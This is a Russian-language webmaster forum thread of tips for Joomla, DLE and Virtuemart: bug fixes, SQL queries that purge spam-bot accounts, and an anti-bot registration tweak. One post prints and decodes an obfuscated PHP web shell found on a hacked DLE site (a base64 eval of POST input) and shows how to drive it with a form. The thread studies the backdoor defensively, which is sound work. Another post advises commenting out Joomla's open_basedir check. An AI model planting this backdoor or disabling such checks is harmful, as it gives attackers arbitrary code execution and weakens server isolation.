Добро пожаловать, Гость
Логин: Пароль: Запомнить меня

ТЕМА: Joomla, DLE, Wordpress

Re: Joomla, DLE, Wordpress 11 года, 9 мес. назад #55

  • Bat
  • Вне сайта
  • Осваиваюсь на форуме
  • Постов: 35
  • Репутация: 0
JFolder::create: Путь не в пределах значения переменной open_basedir

jfolder-create.jpg


Ошибки эти бывают при обновлении Joomla или при установке расширений в Joomla.
Обе лечатся таким методом:

1. Находим файл folder.php он лежит в директории /libraries/joomla/filesystem/folder.php
2. Находим 194 строку (в joomla 1.5) или 220 строку (в Joomla 2,х)
$obd = ini_get('open_basedir')

и отключаем её (комментируем), т.е. ставим впереди этой строки //

У вас должно получится так:

 // We need to get and explode the open_basedir paths
 // $obd = ini_get('open_basedir');

P.S. Обратите внимение - что после обновления Joomla эту процедуру иногда приходится повторять.
Изменено: 11 года, 9 мес. назад от Bat.

Re: Joomla, DLE, Wordpress 11 года, 9 мес. назад #56

  • Bat
  • Вне сайта
  • Осваиваюсь на форуме
  • Постов: 35
  • Репутация: 0
Сайт построен на DLE 9.5
В корне сайта найден файл .142a.php
<?php //cb6f82f3e4007bdaccf419abafab94c8 
 $_= 
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0='; 
 //system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));


Если декодировать (base64):
CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=

получим:
if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}


строчку
JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7

получим:
$code = base64_decode($_);
eval($code);


Строчку
\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65

получим (HEX DECODE)
base64_decode



Что делает этот скрипт? Позволяет выполнить любой php код на вашем сервере.
Используя специальный шелы можно получить полный доступ к вашему сайту и базе данных.

Как это происходит?
Если Вы нашли этот скрипт на своем сайте Вы можете убедится в его возможностях.
Зайдите по ФТП и создайте рядом файл 111.php (в нашем случае он в корне) с текстом:
<form name="form1" method="post" action="ХХХ.php">
  Введите текст:<br />
<textarea name="code" cols="80" rows="10"></textarea>

<br />
<br />
<input name="" type="submit" value="Отправить"/>

</form>

Где ХХХ.php имя вредоносного файла. (В нашем случае это .142a.php)
Теперь в браузере переходим:
http://ваш_сайт.зона/111.php

на другой вкладке переходим на сайт base64.ru/
в первое поле вводим php код:
echo "test";

во втором поле получаем
ZWNobyAidGVzdCI7

Полученный зашифрованный код вставляем по адресу http://ваш_сайт.зона/111.php и жмем "отправить"

Мы увидим:
test

по адресу
http://ваш_сайт.зона/ХХХ.php


Таким образом злоумышленник передавая методом POST шифрованный PHP код на вредоносный скрипт может выполнить любые действия с Вашим ресурсом.
Изменено: 11 года, 9 мес. назад от Bat.

Re: Joomla, DLE, Wordpress 11 года, 9 мес. назад #57

  • Bat
  • Вне сайта
  • Осваиваюсь на форуме
  • Постов: 35
  • Репутация: 0
Чистим базу CMS DLE от зарегистрированных ботов.

ПЕРЕД ЛЮБЫМИ ДЕЙСТВИЯМИ ДЕЛАЕМ БЕКАП БАЗЫ!

1. Первый параметр.
Как правило, боты оставляют в профиле активные ссылки.
Удаляем пользователей в профиле которых есть такие ссылки.
Для этого в PhpMyAdmin выполняем SQL-запрос:

DELETE FROM  `dle_users` 
WHERE  `info` LIKE  '%a href="http:%'


dle_spam1.JPG


2. Параметр.
Ссылки с помощью тегов URL и неактивны ссылки. Проанализируйте базу и убедитесь, что указное действие не удалит живых пользователей
DELETE FROM  `dle_users` 
WHERE  `info` LIKE  '%http://%'


dle_spam2.JPG


Таким образом база была очищена от 16 тысяч ботов.

И еще несколько SQL скриптов по удалению пользователей профиль которых содержит СТОП-слова.
(проверьте список в ракурсе тематики своего сайта)

delete
FROM  `dle_users` 
WHERE  
(`info` LIKE  '%телефон%')
or 
(`info` LIKE  '%бесплатно%')
or 
(`info` LIKE  '%музыка%')
or
(`info` LIKE  '%phpbb3%')
or
(`info` LIKE  '%андроид%')
or
(`info` LIKE  '%Контрактов%')
or
(`info` LIKE  '%samsung%')
or
(`info` LIKE  '%29-25-339%')
or
(`info` LIKE  '%usb%')
or
(`info` LIKE  '%android%')
or
(`info` LIKE  '%online%')
or
(`info` LIKE  '%самсунг%')

delete
FROM  `dle_users` 
WHERE  
(`signature` LIKE  '%телефон%')
or 
(`signature` LIKE  '%бесплатно%')
or 
(`signature` LIKE  '%музыка%')
or
(`signature` LIKE  '%phpbb3%')
or
(`signature` LIKE  '%андроид%')
or
(`signature` LIKE  '%Контрактов%')
or
(`signature` LIKE  '%samsung%')
or
(`signature` LIKE  '%29-25-339%')
or
(`signature` LIKE  '%usb%')
or
(`signature` LIKE  '%android%')
or
(`signature` LIKE  '%online%')
or
(`signature` LIKE  '%самсунг%')


delete
FROM  `dle_users` 
WHERE  
(`info` LIKE  '%камеры%')
or 
(`info` LIKE  '%сервис%')
or 
(`info` LIKE  '%штукатурно%')
or
(`info` LIKE  '%http://%')
or
(`info` LIKE  '%зарабатывание%')
or
(`info` LIKE  '%Взлом%')
or
(`info` LIKE  '%выкуп%')
or
(`info` LIKE  '%сайтов%')
or
(`info` LIKE  '%www.%')
or
(`info` LIKE  '%World%')
or
(`info` LIKE  '%.ua%')
or
(`info` LIKE  '%Corporate%')
or
(`info` LIKE  '%.com%')
or
(`info` LIKE  '%[/url]%')
or
(`info` LIKE  '%аренда%')
or
(`info` LIKE  '%.ru%')
or
(`info` LIKE  '%.com%')
or
(`info` LIKE  '%down%')
or
(`info` LIKE  '%lololxD%')
or
(`info` LIKE  '%good trip%')
or
(`info` LIKE  '%.net%')
or
(`info` LIKE  '%cnn%')
or
(`info` LIKE  '%citystroy%')
or
(`info` LIKE  '%https://%')
or
(`info` LIKE  '%Anonymous%')




delete
FROM  `dle_users` 
WHERE  
(`signature` LIKE  '%камеры%')
or 
(`signature` LIKE  '%сервис%')
or 
(`signature` LIKE  '%штукатурно%')
or
(`signature` LIKE  '%http://%')
or
(`signature` LIKE  '%зарабатывание%')
or
(`signature` LIKE  '%Взлом%')
or
(`signature` LIKE  '%выкуп%')
or
(`signature` LIKE  '%сайтов%')
or
(`signature` LIKE  '%www.%')
or
(`signature` LIKE  '%World%')
or
(`signature` LIKE  '%.ua%')
or
(`signature` LIKE  '%Corporate%')
or
(`signature` LIKE  '%.com%')
or
(`signature` LIKE  '%[/url]%')
or
(`signature` LIKE  '%аренда%')
or
(`signature` LIKE  '%.ru%')
or
(`signature` LIKE  '%.com%')
or
(`signature` LIKE  '%down%')
or
(`signature` LIKE  '%lololxD%')
or
(`signature` LIKE  '%good trip%')
or
(`signature` LIKE  '%.net%')
or
(`signature` LIKE  '%cnn%')
or
(`signature` LIKE  '%citystroy%')
or
(`signature` LIKE  '%https://%')
or
(`signature` LIKE  '%Anonymous%')

и еще несколько сотен ботов удалено...

И самое интересное: удаляем по городам (проанализированы пользователи с повторяющимися значениями поля LAND):
delete FROM `dle_users` WHERE 
(`land` LIKE '%Aarschot%') or
(`land` LIKE '%Al Ladhiqiyah%') or
(`land` LIKE '%Al Manamah%') or       
(`land` LIKE '%Albany%') or   
(`land` LIKE '%Algiers%') or  
(`land` LIKE '%Andorra%') or  
(`land` LIKE '%Arcatao%') or      
(`land` LIKE '%Avarua%') or    
(`land` LIKE '%Axum%') or   
 (`land` LIKE '%Baghdad%') or 
 (`land` LIKE '%Bamako%') or 
 (`land` LIKE '%Bandar%') or 
 (`land` LIKE '%Banepa%') or 
 (`land` LIKE '%Banjul%') or 
 (`land` LIKE '%Bedford%') or 
 (`land` LIKE '%Bereeda%') or 
 (`land` LIKE '%best%') or 
 (`land` LIKE '%Biel%') or 
 (`land` LIKE '%Bijeljina%') or 
 (`land` LIKE '%Boden%') or 
 (`land` LIKE '%Bottegone%') or 
 (`land` LIKE '%Bridgetown%') or 
 (`land` LIKE '%Burnt%') or 
 (`land` LIKE '%Cairo%') or 
 (`land` LIKE '%Carthage%') or 
 (`land` LIKE '%Celaya%') or 
 (`land` LIKE '%Charlotte%') or 
 (`land` LIKE '%Cheltenham%') or 
 (`land` LIKE '%Colonel%') or 
 (`land` LIKE '%Comilla%') or 
 (`land` LIKE '%community%') or 
 (`land` LIKE '%Cotonou%') or 
 (`land` LIKE '%Debrecen%') or 
 (`land` LIKE '%Delmas%') or 
 (`land` LIKE '%Doha%') or 
 (`land` LIKE '%Duverge%') or 
 (`land` LIKE '%Edson%') or 
 (`land` LIKE '%Elvas%') or 
 (`land` LIKE '%Ennis%') or 
 (`land` LIKE '%Estepona%') or 
 (`land` LIKE '%Falmouth%') or 
 (`land` LIKE '%Freetown%') or 
 (`land` LIKE '%Freising%') or 
 (`land` LIKE '%Fweetown%') or 
 (`land` LIKE '%District%') or 
 (`land` LIKE '%Garhoud%') or 
 (`land` LIKE '%Generic%') or 
 (`land` LIKE '%Gliwice%') or 
 (`land` LIKE '%Grand%') or 
 (`land` LIKE '%Gray%') or 
 (`land` LIKE '%Greensboro%') or 
 (`land` LIKE '%Hagatna%') or 
 (`land` LIKE '%Havana%') or 
 (`land` LIKE '%Hesperange%') or 
 (`land` LIKE '%Minh%') or 
 (`land` LIKE '%Hohenems%') or 
 (`land` LIKE '%Hoskins%') or 
 (`land` LIKE '%Istanbul%') or 
 (`land` LIKE '%Jalapa%') or 
 (`land` LIKE '%Jbeil%') or 
 (`land` LIKE '%Jubail%') or 
 (`land` LIKE '%Kabul%') or 
 (`land` LIKE '%Kaduna%') or 
 (`land` LIKE '%Kakamega%') or 
 (`land` LIKE '%Kalamaria%') or 
 (`land` LIKE '%Kampala%') or 
 (`land` LIKE '%Kaohsiung%') or 
 (`land` LIKE '%Karak%') or 
 (`land` LIKE '%Karakol%') or 
 (`land` LIKE '%Keflavik%') or 
 (`land` LIKE '%side%') or 
 (`land` LIKE '%Khujand%') or 
 (`land` LIKE '%Klimmen%') or 
 (`land` LIKE '%Kralupy%') or 
 (`land` LIKE '%Krk%') or 
 (`land` LIKE '%Kulim%') or 
 (`land` LIKE '%Kuwait%') or 
 (`land` LIKE '%Kwajalein%') or 
 (`land` LIKE '%Kwekwe%') or 
 (`land` LIKE '%Lima%') or 
 (`land` LIKE '%Primavera%') or 
 (`land` LIKE '%gartera%') or 
 (`land` LIKE '%Lansing%') or 
 (`land` LIKE '%Lanta%') or 
 (`land` LIKE '%Laona%') or 
 (`land` LIKE '%Lar%') or 
 (`land` LIKE '%Laredo%') or 
 (`land` LIKE '%failure%') or 
 (`land` LIKE '%Mans%') or 
 (`land` LIKE '%Liany%') or 
 (`land` LIKE '%Liberia%') or 
 (`land` LIKE '%Ligatne%') or 
 (`land` LIKE '%Lilongwe%') or 
 (`land` LIKE '%Linguere%') or 
 (`land` LIKE '%Loja%') or 
 (`land` LIKE '%Lome%') or 
 (`land` LIKE '%Lusaka%') or 
 (`land` LIKE '%Madagascar%') or 
 (`land` LIKE '%Madrid%') or 
 (`land` LIKE '%Mankon%') or 
 (`land` LIKE '%Manta%') or 
 (`land` LIKE '%Maputo%') or 
 (`land` LIKE '%Market%') or 
 (`land` LIKE '%Memphis%') or 
 (`land` LIKE '%Mena%') or 
 (`land` LIKE '%Mobile%') or 
 (`land` LIKE '%Monrovia%') or 
 (`land` LIKE '%Montevideo%') or 
 (`land` LIKE '%Mosta%') or 
 (`land` LIKE '%Mount%') or 
 (`land` LIKE '%Mtskheta%') or 
 (`land` LIKE '%Muscat%') or 
 (`land` LIKE '%Namibia%') or 
 (`land` LIKE '%Nestor%') or 
 (`land` LIKE '%Netherlands%') or 
 (`land` LIKE '%AMSTERDAM%') or 
 (`land` LIKE '%newYork%') or 
 (`land` LIKE '%new York%') or 
 (`land` LIKE '%Nis%') or 
 (`land` LIKE '%.com%') or 
 (`land` LIKE '%Nove%') or 
 (`land` LIKE '%Nuuk%') or 
 (`land` LIKE '%Nuwara%') or 
 (`land` LIKE '%NY%') or 
 (`land` LIKE '%Oakland%') or 
 (`land` LIKE '%Orange%') or 
 (`land` LIKE '%Oruro%') or 
 (`land` LIKE '%Paphos%') or 
 (`land` LIKE '%Paris%') or 
 (`land` LIKE '%Parnu%') or 
 (`land` LIKE '%Phoenix%') or 
 (`land` LIKE '%Piran%') or 
 (`land` LIKE '%Pirassununga%') or 
 (`land` LIKE '%Plovdiv%') or 
 (`land` LIKE '%Porsgrunn%') or 
 (`land` LIKE '%Praia%') or 
 (`land` LIKE '%Princeton%') or 
 (`land` LIKE '%puertogalera%') or 
 (`land` LIKE '%Qingdao%') or 
 (`land` LIKE '%Quatre%') or 
 (`land` LIKE '%Raanana%') or 
 (`land` LIKE '%Rajkot%') or 
 (`land` LIKE '%sale%') or 
 (`land` LIKE '%Grande%') or 
 (`land` LIKE '%Riverside%') or 
 (`land` LIKE '%rolsport.ru%') or 
 (`land` LIKE '%SaintGeorge%') or 
 (`land` LIKE '%San Miguelde Tucuman%') or 
 (`land` LIKE '%San Vicente De Tagua Tagua%') or 
 (`land` LIKE '%Sanaa%') or 
 (`land` LIKE '%Santa%') or 
  (`land` LIKE '%Santo%') or 
 (`land` LIKE '%ScenicOaks%') or 
 (`land` LIKE '%Sembawang%') or 
 (`land` LIKE '%Skive%') or 
 (`land` LIKE '%Soledos%') or 
 (`land` LIKE '%Spitak%') or 
 (`land` LIKE '%Stirling%') or 
 (`land` LIKE '%Stung Treng%') or 
 (`land` LIKE '%Sumbe%') or 
 (`land` LIKE '%Suva%') or 
 (`land` LIKE '%Sydney%') or 
 (`land` LIKE '%Tafraout%') or 
 (`land` LIKE '%Taiping%') or 
 (`land` LIKE '%hassee%') or 
 (`land` LIKE '%Tamana%') or 
 (`land` LIKE '%Tanta%') or 
 (`land` LIKE '%TirguMures%') or 
 (`land` LIKE '%Toledo%') or 
 (`land` LIKE '%Tomohon%') or 
 (`land` LIKE '%trilep%') or 
 (`land` LIKE '%Udon%') or 
 (`land` LIKE '%Ulaanbaatar%') or 
 (`land` LIKE '%viagra%') or 
 (`land` LIKE '%Virbalis%') or 
 (`land` LIKE '%Walvis%') or 
 (`land` LIKE '%Washington%') or 
 (`land` LIKE '%Wete%') or 
 (`land` LIKE '%Willemstad%') or 
 (`land` LIKE '%www.bankupskirt.com%') or 
 (`land` LIKE '%XantaRrsq%') or 
 (`land` LIKE '%Yako%') or 
 (`land` LIKE '%Yanahuara%') or 
 (`land` LIKE '%Yangon%') or 
 (`land` LIKE '%Zikemetig%') 


dle_spam3.JPG


Это все набралось за последние несколько месяцев. Так что скрипт по очистке очень актуален.
Изменено: 11 года, 9 мес. назад от Bat.

Re: Joomla, DLE, Wordpress 11 года, 9 мес. назад #58

  • Bat
  • Вне сайта
  • Осваиваюсь на форуме
  • Постов: 35
  • Репутация: 0
Защищаем DLE от автоматических регистраций.
(При условии, что включена капча и присутсвует дополнительное поле с вопросом).

1. Открываем файл: engine/modules/register.php
ищем:
$sec_code = $_POST['sec_code'];

и меняем на свое:
$sec_code = $_POST['your_text'];

2. Открываем файл: templates/Ваш_шаблон/registration.tpl
находим:
<input type="text" name="sec_code" style="width:115px" class="f_input" />

заменяем (типичное для DLE поле также оставляем специально чтоб запутать спам-программу, но делаем его невидимым для пользователей):
<input type="text" name="sec_code" style="display:none" />
<input type="text" name="your_text" style="width:115px" class="f_input" />


your_text - меняем на свой уникальный набор латинских символов.

Re: Joomla, DLE, Wordpress 11 года, 9 мес. назад #64

  • Bat
  • Вне сайта
  • Осваиваюсь на форуме
  • Постов: 35
  • Репутация: 0
Увеличить количествово символов краткого описания Virtuemart 2.0

В файле:

public_html/components/com_virtuemart/views/category/tmpl/default.php


в строке 233 (может меняться, просто найдите через поиск product_s_desc)
<?php echo shopFunctionsF::limitStringByWord($product->product_s_desc, 40, ‘…’)?> 

(кол-во 440 означает сколько символов в кратком описании. Выставите свое число)
Изменено: 11 года, 9 мес. назад от Bat.

Re: Joomla, DLE, Wordpress 11 года, 3 мес. назад #66

  • Bat
  • Вне сайта
  • Осваиваюсь на форуме
  • Постов: 35
  • Репутация: 0
Joomla 2.5 Virtuemart 2.x
Ошибка:
HP Warning: Division by zero in /templates/leo_tools/html/mod_lofvmslideshows/_contentslider/image-description.php on line 11

Лечение:

в указанном файле добавить условие

if ($prices['basePriceWithTax']!=0) {
$percent = (intval($prices['discountAmount']) / intval($prices['basePriceWithTax']))*100;
}
Изменено: 11 года, 3 мес. назад от Bat.
| + - | RTL - LTR